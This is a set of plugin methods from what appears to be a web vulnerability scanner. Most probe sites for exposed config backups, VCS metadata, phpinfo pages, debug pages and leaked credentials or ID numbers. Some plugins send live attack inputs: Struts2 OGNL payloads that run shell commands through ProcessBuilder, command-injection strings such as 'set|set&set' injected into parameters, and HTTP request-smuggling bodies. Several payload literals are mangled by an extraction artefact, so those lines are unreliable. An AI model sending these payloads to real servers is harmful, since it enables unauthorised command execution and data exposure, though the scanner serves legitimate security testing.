    def audit(self):
        """Report exposed WordPress configuration backups at the site root.

        Runs only when the observed response looks like a WordPress page
        (a ``/wp-content/themes/`` reference in the body). A fixed list of
        common ``wp-config`` backup/leftover names is then requested at the
        site root, and every candidate that answers 200 with PHP source in
        the body is reported.
        """
        headers = self.requests.get_headers()  # request headers, dict
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)
        parsed = self.requests.urlparse

        # Non-WordPress sites are not probed at all.
        if "/wp-content/themes/" not in resp_str:
            return

        # Site root without the trailing slash, so a leaf can be appended.
        site_root = "{}://{}/".format(parsed.scheme, parsed.netloc).rstrip('/')
        backup_names = (
            '/wp-config.php.inc',
            '/wp-config.inc',
            '/wp-config.bak',
            '/wp-config.php~',
            '/.wp-config.php.swp',
            '/wp-config.php.bak',
        )

        for leaf in backup_names:
            probe = site_root + leaf
            reply = requests.get(probe, headers=headers)
            # A backup copy is served as plain text, so the PHP open tag
            # shows up in the body instead of being executed.
            if reply.status_code == 200 and '<?php' in reply.text:
                out.success(probe, self.name)
    def audit(self):
        """Detect framework debug/development error pages.

        Requests a random, non-existent ``<6 chars>.jsp`` at the site root
        and matches the error page against known debug-mode signatures
        (ASP.NET path disclosure, Struts2 devMode, Django ``DEBUG = True``,
        Rails exception page, "required parameter" error, ThinkPHP 3 debug
        face). The first signature that matches is reported.
        """
        headers = self.requests.get_headers()  # request headers, dict
        parsed = self.requests.urlparse

        probe_url = "{}://{}/".format(parsed.scheme, parsed.netloc) + random_str(6) + ".jsp"

        # label -> regex applied to the error page (re.S | re.I)
        signatures = {
            "ASPNETPathDisclosure":
            r"<title>Invalid\sfile\sname\sfor\smonitoring:\s'([^']*)'\.\sFile\snames\sfor\smonitoring\smust\shave\sabsolute\spaths\,\sand\sno\swildcards\.<\/title>",
            "Struts2DevMod":
            "You are seeing this page because development mode is enabled.  Development mode, or devMode, enables extra",
            "Django DEBUG MODEL":
            r"You're seeing this error because you have <code>DEBUG = True<\/code> in",
            "RailsDevMode":
            r"<title>Action Controller: Exception caught<\/title>",
            "RequiredParameter":
            r"Required\s\w+\sparameter\s'([^']+?)'\sis\snot\spresent",
            "Thinkphp3 Debug": r'<p class="face">:\(</p>',
        }

        reply = requests.get(probe_url, headers=headers)
        matched = next(
            (label for label, pattern in signatures.items()
             if re.search(pattern, reply.text, re.S | re.I)),
            None,
        )
        if matched is not None:
            out.success(probe_url, self.name, name=matched)
    def _javascript_redirect(self, response: requests.Response):
        """Report script statements that contain the injected test domain.

        Every script statement extracted from *response* is checked for
        ``self.test_domain``; each statement containing it is reported via
        ``out.success``. The method always returns ``False`` — the caller
        cannot use the return value to learn whether anything was found.

        Typical redirect statements this is meant to catch (all also work
        without the leading ``window.``)::

            window.location = "http://www.w3af.org/";
            window.location.href = "http://www.w3af.org/";
            window.location.replace("http://www.w3af.org");
            window.location.assign('http://www.w3af.org');

            self.location = 'http://www.w3af.org';
            top.location = 'http://www.w3af.org';

            // jQuery
            $(location).attr('href', 'http://www.w3af.org');
            $(window).attr('location', 'http://www.w3af.org');
            $(location).prop('href', 'http://www.w3af.org');

            // Only for old IE
            window.navigate('http://www.w3af.org');
        """
        marker = self.test_domain
        tainted = filter(lambda statement: marker in statement,
                         self._extract_script_code(response))
        for statement in tainted:
            out.success(self.uri,
                        self.name,
                        msg="当前JavaScript脚本发现被注入url,在 {}".format(statement))

        return False
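    def audit(self):
        """Run ``main_scanner`` over the response body and every script it links.

        The body is scanned against the request URL, then each script URL
        returned by ``js_extractor`` is scanned with an empty body. Every
        truthy result dict is reported through ``out.success`` as keyword
        arguments, always attributed to the request URL.
        """
        url = self.build_url()  # full request URL
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)

        # Fix: the request body used to be decoded into an unused local,
        # which could raise UnicodeDecodeError for no benefit; dropped.

        # (target, body) pairs: the page itself first, then its scripts with
        # no body — same call order as before.
        targets = [(url, resp_str)]
        targets.extend((link, '') for link in js_extractor(resp_str))

        # Collect first, report afterwards (keeps scanning and reporting
        # side effects in the original order).
        findings = [main_scanner(target, body) for target, body in targets]
        for finding in findings:
            if finding:
                out.success(url, self.name, **finding)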
    def audit(self):
        """Look for leftover phpinfo() pages next to the current URL.

        Skipped when the fingerprinted language is known and is not PHP.
        For each common file name, the request URL (slashes stripped) plus
        ``/<name>`` is fetched; a body carrying the phpinfo() title is parsed
        with ``get_phpinfo`` and reported.
        """
        headers = self.requests.get_headers()  # request headers, dict
        url = self.build_url()  # full request URL

        language = self.response.language
        if language and language != "PHP":
            return

        base = url.strip('/') + "/"
        common_names = ("phpinfo.php", "pi.php", "php.php", "i.php",
                        "test.php", "temp.php", "info.php")
        for leaf in common_names:
            probe = base + leaf
            reply = requests.get(probe, headers=headers)
            if "<title>phpinfo()</title>" not in reply.text:
                continue
            out.success(probe, self.name, info=get_phpinfo(reply.text))
    def audit(self):
        """Report phpinfo() output and ID-card / bank-card numbers in the body.

        Purely passive: only the already-observed response is inspected. A
        phpinfo() page is parsed with ``get_phpinfo``; then each detector
        (``sensitive_idcard``, ``sensitive_bankcard``) is run over the body
        and every hit that passes ``out.set`` is reported with its type.
        """
        url = self.build_url()  # full request URL
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)

        if "<title>phpinfo()</title>" in resp_str:
            out.success(url, self.name, info=get_phpinfo(resp_str))

        for detector in (sensitive_idcard, sensitive_bankcard):
            # detector returns a falsy value or a list of {"content", "type"}
            for hit in detector(resp_str) or ():
                content = str(hit["content"])
                # out.set() gates the report (presumably a seen-set that
                # de-duplicates values across plugins — confirm).
                if out.set(content):
                    out.success(url,
                                self.name,
                                content=content,
                                type=hit["type"])
    def audit(self):
        """Probe for exposed VCS metadata (SVN, Git, Bazaar, CVS, Mercurial).

        For each well-known metadata file the request URL plus the leaf is
        fetched and the body is matched against a signature regex; a match
        is reported. Any exception in a probe is ignored, so one failing
        request does not stop the others.
        """
        headers = self.requests.get_headers()  # request headers, dict
        base = self.build_url().rstrip('/')

        # leaf -> regex that identifies the file's real content
        signatures = {
            "/.svn/all-wcprops": "svn:wc:ra_dav:version-url",
            "/.git/config": r'repositoryformatversion[\s\S]*',
            "/.bzr/README": r'This\sis\sa\sBazaar[\s\S]',
            '/CVS/Root': r':pserver:[\s\S]*?:[\s\S]*',
            '/.hg/requires': '^revlogv1.*',
        }
        for leaf, pattern in signatures.items():
            probe = base + leaf
            try:
                reply = requests.get(probe, headers=headers)
                if re.search(pattern, reply.text, re.I | re.S | re.M):
                    out.success(probe, self.name)
            except Exception:
                pass  # best-effort probe: errors skip this candidate
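    def audit(self):
        """Report mobile-phone and ID-card numbers leaked in a POST response.

        Passive check on POST exchanges only. Each full regex match is
        de-duplicated through ``out.set`` and reported with the request URL.

        Fix: the ID-card pattern has three capture groups, so ``re.findall``
        returned (group1, group2, group3) tuples instead of the matched
        number; ``re.finditer`` + ``group(0)`` reports the whole match.
        """
        method = self.requests.command  # request method, GET or POST
        url = self.build_url()  # full request URL
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)

        if method != 'POST':
            return

        # mobile phone number: known prefix followed by 8 digits
        regx_phone = r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}'
        # ID card number: region, birth date (year/month/day), sequence, check digit
        regx_identify = r'([1-9]\d{5}[12]\d{3}(0[1-9]|1[012])(0[1-9]|[12][0-9]|3[01])\d{3}[0-9xX])'
        for pattern in (regx_phone, regx_identify):
            # group(0) is the full match regardless of how many groups the
            # pattern has; the set drops repeats within one response.
            values = {m.group(0) for m in re.finditer(pattern, resp_str, re.M | re.I)}
            for value in values:
                if out.set(value):
                    out.success(url, self.name, method='POST', info=value)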
    def audit(self):
        """Check a Java GET endpoint for OGNL evaluation of the Content-Type header.

        Skipped when the fingerprinted language is known and is not JAVA,
        when the method is not GET, or when the path extension is not in
        ``acceptedExt``. Each payload replaces the ``Content-Type`` value of
        the replayed request; a response containing the ``check`` marker is
        reported once and the loop stops.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers, dict
        url = self.build_url()  # full request URL
        resp_data = self.response.get_body_data()  # response body, bytes
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)
        resp_headers = self.response.get_headers()  # response headers, dict
        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc
        if self.response.language and self.response.language != "JAVA":
            return
        if method == 'GET':
            exi = os.path.splitext(p.path)[1]
            if exi not in acceptedExt:
                return
            # Marker the payloads write into the response. Inside the payloads
            # it is assembled from pieces, presumably so a server that merely
            # echoes the request header back does not trigger a false positive.
            check=  '<Struts2-vuln-Check>'
            # NOTE(review): the "[email protected]" tokens below are an extraction
            # artefact (e-mail obfuscation applied to "@...@" sequences); the
            # literals as shown are not what the upstream plugin contains, so
            # this listing is not runnable as-is.
            payloads = [
                r"%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('<'+'Struts2-vuln-'+'Check>')).(#o.close())}",
                r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#[email protected]@getRequest()).(#path=#req.getRealPath('Struts2-vuln-'+'Check>')).(#o.println(#path)).(#o.close())}",
                r'''%{(#f**k='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse().getWriter()).(#outstr.println(#req.getRealPath("Struts2-vuln-"+"Check>"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'''
            ]

            for payload in payloads:
                # NOTE(review): this mutates the dict returned by get_headers();
                # if that is the live request mapping rather than a copy, the
                # last payload stays in it for later plugins — confirm.
                headers['Content-Type']= payload
                r = requests.get(url, headers=headers)
                html1 = r.text
                if check in html1:
                    # "playload" (sic) is the keyword out.success consumes; kept
                    # as-is because renaming it would change the report schema.
                    out.success(url, self.name, playload="{}:{}".format('Content-Type',payload), method=method,check=check,raw=r.raw)
                    break
    def audit(self):
        """Probe generated paths at the site root and report the ones that match.

        ``self.generate()`` yields dicts with ``path``, ``tag``,
        ``content-type`` and ``content-type_no``. A candidate is reported when
        it answers 200, its body contains ``tag`` (if set), its Content-Type
        contains ``content-type`` (if set) and does not contain
        ``content-type_no`` (if set).
        """
        headers = self.requests.get_headers()  # request headers, dict
        parsed = self.requests.urlparse
        site_root = "{}://{}/".format(parsed.scheme, parsed.netloc).rstrip('/')

        for candidate in self.generate():
            probe = site_root + candidate["path"]
            reply = requests.get(probe, headers=headers)
            content_type = reply.headers.get('Content-Type', '')
            wanted_tag = candidate["tag"]
            wanted_ct = candidate["content-type"]
            unwanted_ct = candidate["content-type_no"]
            # Any one failing condition rejects the candidate.
            rejected = (
                reply.status_code != 200
                or (wanted_tag and wanted_tag not in reply.text)
                or (wanted_ct and wanted_ct not in content_type)
                or (unwanted_ct and unwanted_ct in content_type)
            )
            if not rejected:
                out.success(probe, self.name)
    def _check(self, k, v, method, url, data):
        """Report parameter *k* when its value *v* looks like a serialized object.

        *v* is tested, in order, as a Java, PHP or Python serialized object;
        the first detector that fires names the finding. GET findings carry
        the method and ``k:v``; POST findings additionally carry the
        stringified request body *data*. Other methods are not reported.
        """
        detectors = (
            ("JavaObjectDeserialization", isJavaObjectDeserialization),
            ("PHPObjectDeserialization", isPHPObjectDeserialization),
            ("PythonObjectDeserialization", isPythonObjectDeserialization),
        )
        kind = next((label for label, detect in detectors if detect(v)), None)
        if kind is None:
            return

        details = dict(method=method, parameter=k + ":" + v, what=kind)
        if method == "POST":
            details["data"] = str(data)
        if method in ("GET", "POST"):
            out.success(url, self.name, **details)
    def audit(self):
        """Probe a 200 page for HTTP request smuggling (CL.TE and TE.CL desync).

        Both phases replay the request as a POST carrying conflicting
        ``Content-Length`` and ``Transfer-Encoding: chunked`` headers and a
        small body, up to ``cycle`` times each. A probe is reported when the
        server answers 403 with a body that differs from the original
        response; the method returns after the first report.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers, dict
        url = self.build_url()  # full request URL

        resp_data = self.response.get_body_data()  # response body, bytes
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)
        resp_headers = self.response.get_headers()  # response headers, dict

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        cycle = 5
        # NOTE(review): never read — the requests.post() call below passes the
        # literal 30, and the Session.send() call passes no timeout at all.
        timeout = 30

        if self.response.status != 200:
            return
        # request_smuggling_cl_te: front end trusts Content-Length, back end
        # trusts Transfer-Encoding.
        for i in range(cycle):
            payload_headers = {
                "Content-Length": "6",
                "Transfer-Encoding": "chunked"
            }
            data = b'0\r\n\r\nS'.decode()
            # Copied so the original header dict is left unchanged.
            temp_header = headers.copy()
            for k, v in payload_headers.items():
                # Replace an existing lower-cased key instead of adding a
                # second header with a different case.
                if k.lower() in temp_header:
                    temp_header[k.lower()] = v
                else:
                    temp_header[k] = v
            try:
                r = requests.post(url, headers=temp_header, data=data, timeout=30)
            except:
                # NOTE(review): bare except also swallows KeyboardInterrupt and
                # SystemExit; the intended scope is the requests exceptions.
                continue
            # 403 with a changed body is taken as the back end rejecting the
            # leftover bytes of the desynchronised request.
            if r.status_code == 403 and resp_str != r.text:
                out.success(url, self.name, method='POST', **payload_headers, type="CL.TE型", data='0\\r\\n\\r\\nS', )
                return
        # request_smuggling_te_cl: the mirror case, chunked body with a short
        # Content-Length.
        # NOTE(review): cycle+1 iterations here versus cycle above — confirm intended.
        for i in range(cycle+1):
            payload_headers = {
                "Content-Length": "3",
                "Transfer-Encoding": "chunked"
            }
            data = b'1\r\nD\r\n0\r\n\r\n'.decode()
            # A prepared request is used so the Content-Length computed by
            # requests can be overridden before sending.
            req = Request('POST', url, data=data, headers=headers)
            prepped = req.prepare()
            for k, v in payload_headers.items():
                # prepped.headers is requests' case-insensitive dict, so the
                # delete-then-set replaces any existing value of the header.
                if k.lower() in prepped.headers:
                    del prepped.headers[k.lower()]
                prepped.headers[k] = v
            s = Session()
            try:
                r = s.send(prepped)
            except:
                # NOTE(review): same bare except as above.
                continue
            if r.status_code == 403 and resp_str != r.text:
                # NOTE(review): the reported data ends in "S", but the body
                # actually sent (data above) does not — report and probe disagree.
                out.success(url, self.name, method='POST', **payload_headers, type="TE.CL型",
                            data='1\\r\\nD\\r\\n0\\r\\n\\r\\nS')
                return
    def audit(self):
        """Check whether cookie values are reflected unescaped into the page.

        Only GET requests that carry a query string and at least one cookie
        are tested. For each cookie whose value already appears in the
        original body (case-insensitive), the request is replayed with a
        marker appended to that cookie's value; if the marker comes back
        verbatim in the response body, the cookie is reported.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers, dict
        url = self.build_url()  # full request URL

        resp_data = self.response.get_body_data()  # response body, bytes
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)
        resp_headers = self.response.get_headers()  # response headers, dict

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc
        cookies = self.requests.cookies

        if method == 'GET':
            if p.query == '':
                return
            if not cookies or len(cookies) == 0:
                return

            for k, v in cookies.items():
                # Only a cookie that is already reflected can be tested for
                # unescaped reflection.
                if v.lower() not in resp_str.lower():
                    continue
                # Literal marker: the "{}" is never passed through .format(),
                # so the brackets and braces are sent exactly as written.
                payload = "[<{}>]2333_w13scan"
                # Deep copy so the original cookie mapping is not modified.
                data = copy.deepcopy(cookies)
                data[k] = v + payload
                r = requests.get(url, cookies=data, headers=headers)
                # The marker surviving untouched means "<" and ">" were not
                # encoded on output.
                if payload in r.text:
                    out.success(url,
                                self.name,
                                cookie="{}:{}".format(k, data[k]),
                                raw=r.raw)
    def audit(self):
        """Probe for leaked client configuration files next to the request URL.

        Fetches ``/sftp-config.json`` and ``/recentservers.xml`` under the
        request URL and reports a hit when the JSON carries a
        type/host/user/password block or the XML contains a ``<Pass>``
        element. Any exception in a probe is ignored.
        """
        headers = self.requests.get_headers()  # request headers, dict
        base = self.build_url().rstrip('/')

        json_credentials = re.compile(
            r'("type":[\s\S]*?"host":[\s\S]*?"user":[\s\S]*?"password":[\s\S]*")',
            re.I | re.S | re.M)
        xml_password = re.compile(r'(<Pass>[\s\S]*?<\/Pass>)', re.I)

        for leaf in ("/sftp-config.json", "/recentservers.xml"):
            probe = base + leaf
            try:
                body = requests.get(probe, headers=headers).text
                if json_credentials.search(body) or xml_password.search(body):
                    out.success(probe, self.name)
            except Exception:
                pass  # best-effort probe: errors skip this candidate
    def audit(self):
        """Check JSON/JSONP endpoints for cross-origin data exposure.

        Two cases are handled, both for GET only. If the body already looks
        like a JSONP callback wrapper, the request is replayed with a
        look-alike Referer (the real netloc followed by random characters
        and ``.com``) and reported when the response stays near-identical
        (ratio >= 0.8) and mentions one of ``sensitive_params``. If the body
        is plain JSON and the URL has no ``callback`` yet, a ``callback``
        parameter is added and the response is reported when it comes back
        wrapped in that callback name.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers, dict
        url = self.build_url()  # full request URL

        resp_data = self.response.get_body_data()  # response body, bytes
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)
        resp_headers = self.response.get_headers()  # response headers, dict

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        # JSONP shape: an identifier followed by "({...})".
        # NOTE(review): non-raw string; "\S", "\(", "\{" etc. are invalid
        # escapes that Python keeps verbatim, so the pattern works but emits
        # a (Syntax|Deprecation)Warning at compile time.
        combine = '^\S+\(\{.*?\}\)'
        # Foreign origin that merely resembles the target: scheme://<netloc><4 random>.com/
        domain = "{}://{}".format(p.scheme, p.netloc) + random_str(
            4, string.ascii_lowercase + string.digits) + ".com/"

        # Keywords suggesting the JSON carries account or personal data.
        sensitive_params = [
            'mail', 'user', 'name', 'ip', 'pass', 'add', 'phone'
        ]
        if re.match(combine, resp_str, re.I | re.S):
            # treat as JSONP
            headers["Referer"] = domain
            if method == 'GET':
                r = requests.get(url, headers=headers)
                # Near-identical body under a foreign Referer: the endpoint
                # does not restrict who may embed it.
                if GetRatio(resp_str, r.text) >= 0.8:
                    for i in sensitive_params:
                        # One report per keyword present in the body.
                        if i in r.text.lower():
                            res = {
                                "Referer": domain,
                                "keyword": i,
                                "Content-Type":
                                r.headers.get("Content-Type", "")
                            }
                            response = self.jsonp_load(r.text)
                            if response:
                                res["response"] = response
                                # Long payloads are replaced by a "too much
                                # data, visit yourself" placeholder.
                                if len(response) > 500:
                                    res["response"] = "数据太多,自行访问"
                            out.success(url, self.name, **res)
        elif re.match(JSON_RECOGNITION_REGEX, resp_str,
                      re.I | re.S) and 'callback' not in url:
            # plain JSON, not JSONP
            headers["Referer"] = domain
            # NOTE(review): params is self.requests.params itself; if that is
            # the live mapping rather than a copy, the "callback" key leaks
            # into later plugins — confirm.
            params["callback"] = random_str(2)
            if method == 'GET':
                r = requests.get(netloc, params=params, headers=headers)
                # The server honoured the callback parameter: JSON is
                # wrapped in the random function name.
                if r.text.startswith(params["callback"] + "({"):
                    res = {
                        "Referer": domain,
                        "Content-Type": r.headers.get("Content-Type", ""),
                        "callback": params["callback"],
                    }
                    response = self.jsonp_load(r.text)
                    if response:
                        res["response"] = response
                        if len(response) > 500:
                            res["response"] = "数据太多,自行访问"
                    out.success(r.url, self.name, **res)
    def audit(self):
        """Check GET query parameters for OS command injection.

        Runs only for GET requests with a non-empty query string whose path
        extension is in ``acceptedExt``. Each parameter not listed in
        ``ignoreParams`` is replaced (or suffixed with ``;`` + probe) by an
        environment-dump probe and, on non-Windows targets, an ``echo``
        probe; the replayed response is matched against the regexes that
        identify each probe's output.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers, dict
        url = self.build_url()  # full request URL

        resp_data = self.response.get_body_data()  # response body, bytes
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)
        resp_headers = self.response.get_headers()  # response headers, dict

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method == 'GET':
            if p.query == '':
                return
            exi = os.path.splitext(p.path)[1]
            if exi not in acceptedExt:
                return

            # NOTE(review): randint is only passed to .format() on a string
            # with no "{}" placeholder, so it has no effect on the probe.
            randint = random.randint(1000, 9000)
            # probe string -> regexes that match its output when executed.
            # NOTE(review): the patterns are non-raw strings; "\s"/"\S" are
            # invalid escapes kept verbatim (compile-time warning only), while
            # "\x3d" decodes to "=" — so each "\x3d" pattern is identical to
            # the "=" pattern before it and is redundant.
            url_flag = {
                "set|set&set": [
                    'Path=[\s\S]*?PWD=', 'Path=[\s\S]*?PATHEXT=',
                    'Path=[\s\S]*?SHELL=', 'Path\x3d[\s\S]*?PWD\x3d',
                    'Path\x3d[\s\S]*?PATHEXT\x3d', 'Path\x3d[\s\S]*?SHELL\x3d',
                    'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=',
                    'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d',
                    'Non-authoritative\sanswer:\s+Name:\s*',
                    'Server:\s*.*?\nAddress:\s*'
                ],
                # Expected output is base64("6162983\n") directly followed by
                # the literal, which only appears if the backticks were evaluated.
                "echo `echo 6162983|base64`6162983".format(randint):
                ["NjE2Mjk4Mwo=6162983"]
            }
            # The base64 probe is shell-specific; drop it for Windows or an
            # unknown OS.
            if not self.response.system or self.response.system == "WINDOWS":
                del url_flag["echo `echo 6162983|base64`6162983".format(
                    randint)]

            for k, v in params.items():
                if k.lower() in ignoreParams:
                    continue
                # Copy per parameter so only one value is tampered with at a time.
                data = copy.deepcopy(params)
                for spli in ['', ';']:
                    for flag, re_list in url_flag.items():
                        # '' replaces the value outright; ';' appends the probe
                        # to the original value.
                        if spli == "":
                            data[k] = flag
                        else:
                            data[k] = v + spli + flag
                        url1 = prepare_url(netloc, params=data)
                        r = requests.get(url1, headers=headers)
                        html1 = r.text
                        for rule in re_list:
                            if re.search(rule, html1, re.I | re.S | re.M):
                                out.success(url,
                                            self.name,
                                            payload="{}:{}".format(k, data[k]),
                                            raw=r.raw)
                                # Only leaves the rule loop; other probes for
                                # this parameter are still sent.
                                break
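    def audit(self):
        """Probe generated paths under the request URL and report plausible hits.

        Each candidate from ``self.generate()`` (dicts with ``path``, ``tag``,
        ``content-type``, ``content-type_no``) is fetched without following
        redirects and kept when it answers 200 and satisfies its optional
        conditions. Fewer than ten hits are all reported; otherwise hits are
        grouped by body length and only groups of at most five URLs are
        reported — presumably to drop catch-all pages that answer every path
        with the same body.

        Fix: the bare ``except:`` around the request also swallowed
        KeyboardInterrupt/SystemExit and programming errors; it now catches
        only ``requests.RequestException``.
        """
        headers = self.requests.get_headers()  # request headers, dict
        base = self.build_url().rstrip('/')

        hits = []
        for candidate in self.generate():
            probe = base + candidate["path"]
            try:
                reply = requests.get(probe,
                                     headers=headers,
                                     allow_redirects=False)
            except requests.RequestException:
                continue  # unreachable/failed candidate: skip it
            if reply.status_code != 200:
                continue
            content_type = reply.headers.get('Content-Type', '')
            wanted_tag = candidate["tag"]
            wanted_ct = candidate["content-type"]
            unwanted_ct = candidate["content-type_no"]
            if wanted_tag and wanted_tag not in reply.text:
                continue
            if wanted_ct and wanted_ct not in content_type:
                continue
            if unwanted_ct and unwanted_ct in content_type:
                continue
            hits.append({"url": probe, "len": len(reply.text)})

        if not hits:
            return
        if len(hits) < 10:
            for hit in hits:
                out.success(hit["url"], self.name)
            return

        # Many hits: group by body length; a length shared by more than five
        # URLs is taken as a generic page and not reported.
        by_length = {}
        for hit in hits:
            by_length.setdefault(hit.get("len", 0), []).append(hit["url"])
        for urls in by_length.values():
            if len(urls) <= 5:
                for probe in urls:
                    out.success(probe, self.name)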
    def audit(self):
        """Check a Java GET endpoint for OGNL evaluation in a multipart filename.

        Skipped when the fingerprinted language is known and is not JAVA,
        when the method is not GET, or when the path extension is not in
        ``acceptedExt``. The request is replayed as a multipart POST whose
        file-part filename is each payload in turn; the response is matched
        against ``checks`` (an arithmetic result, printer-device error
        strings, or the literal marker) and the first match is reported.
        """
        method = self.requests.command  # request method, GET or POST
        version = self.requests.request_version  # HTTP 0.9/1.0/1.1
        headers = self.requests.get_headers()  # request headers, dict
        url = self.build_url()  # full request URL
        resp_data = self.response.get_body_data()  # response body, bytes
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)
        resp_headers = self.response.get_headers()  # response headers, dict

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if self.response.language and self.response.language != "JAVA":
            return

        if method == 'GET':
            exi = os.path.splitext(p.path)[1]
            if exi not in acceptedExt:
                return

            # Random subtraction whose result only appears in the response if
            # the `expr` probe was actually evaluated on the server.
            ran_a = random.randint(10000000, 20000000)
            ran_b = random.randint(1000000, 2000000)
            ran_check = ran_a - ran_b
            lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
            # Evidence strings: the expr result, the Windows "unable to
            # initialize device PRN" message (Chinese, mojibake and English
            # forms — presumably what `print test` yields without a printer),
            # and the literal marker written by the last two payloads.
            checks = [
                str(ran_check), '无法初始化设备 PRN', '??????? PRN',
                '<Struts2-vuln-Check>', 'Unable to initialize device PRN'
            ]
            boundary_046 = "---------------------------735323031399963166993862150"
            # NOTE(review): the "[email protected]" tokens below are an extraction
            # artefact (e-mail obfuscation applied to "@...@" sequences); the
            # literals as shown are not what the upstream plugin contains, so
            # this listing is not runnable as-is.
            payloads = [
                r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='print test').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
                r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"
                + lin +
                r"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
                r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('<'+'Struts2-vuln-'+'Check>')).(#o.close())}",
                r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#[email protected]@getRequest()).(#path=#req.getRealPath('Struts2-vuln-')).(#o.print(#path)).(#o.print('Check>')).(#o.close())}"
            ]

            # NOTE(review): the trailing + '' is a no-op; this also mutates the
            # dict returned by get_headers() — if that is the live request
            # mapping, the multipart Content-Type persists for later plugins.
            headers[
                'Content-Type'] = 'multipart/form-data; boundary=' + boundary_046 + ''
            for payload in payloads:
                # Hand-built multipart body: one file part whose filename is
                # the payload followed by a NUL byte and "b".
                data_046 = '--' + boundary_046 + "\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"" + payload + "\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--" + boundary_046 + "--"
                r = requests.post(url, headers=headers, data=data_046)
                html1 = r.text
                for check in checks:
                    if check in html1:
                        # "playload" (sic) is the keyword out.success consumes;
                        # kept as-is to preserve the report schema.
                        out.success(url,
                                    self.name,
                                    playload="{}".format(payload),
                                    method="POST",
                                    check=check,
                                    raw=r.raw)
                        return
    def audit(self):
        """Check form-encoded POST parameters for OS command injection.

        Runs only for POST requests whose body hint is ``POST_HINT.NORMAL``.
        Each parameter not listed in ``ignoreParams`` is replaced (or
        suffixed with ``;`` + probe) by an environment-dump probe and an
        ``echo`` probe; the replayed response is matched against the regexes
        that identify each probe's output. Unlike the GET variant, the
        ``echo`` probe is sent regardless of the fingerprinted OS.
        """
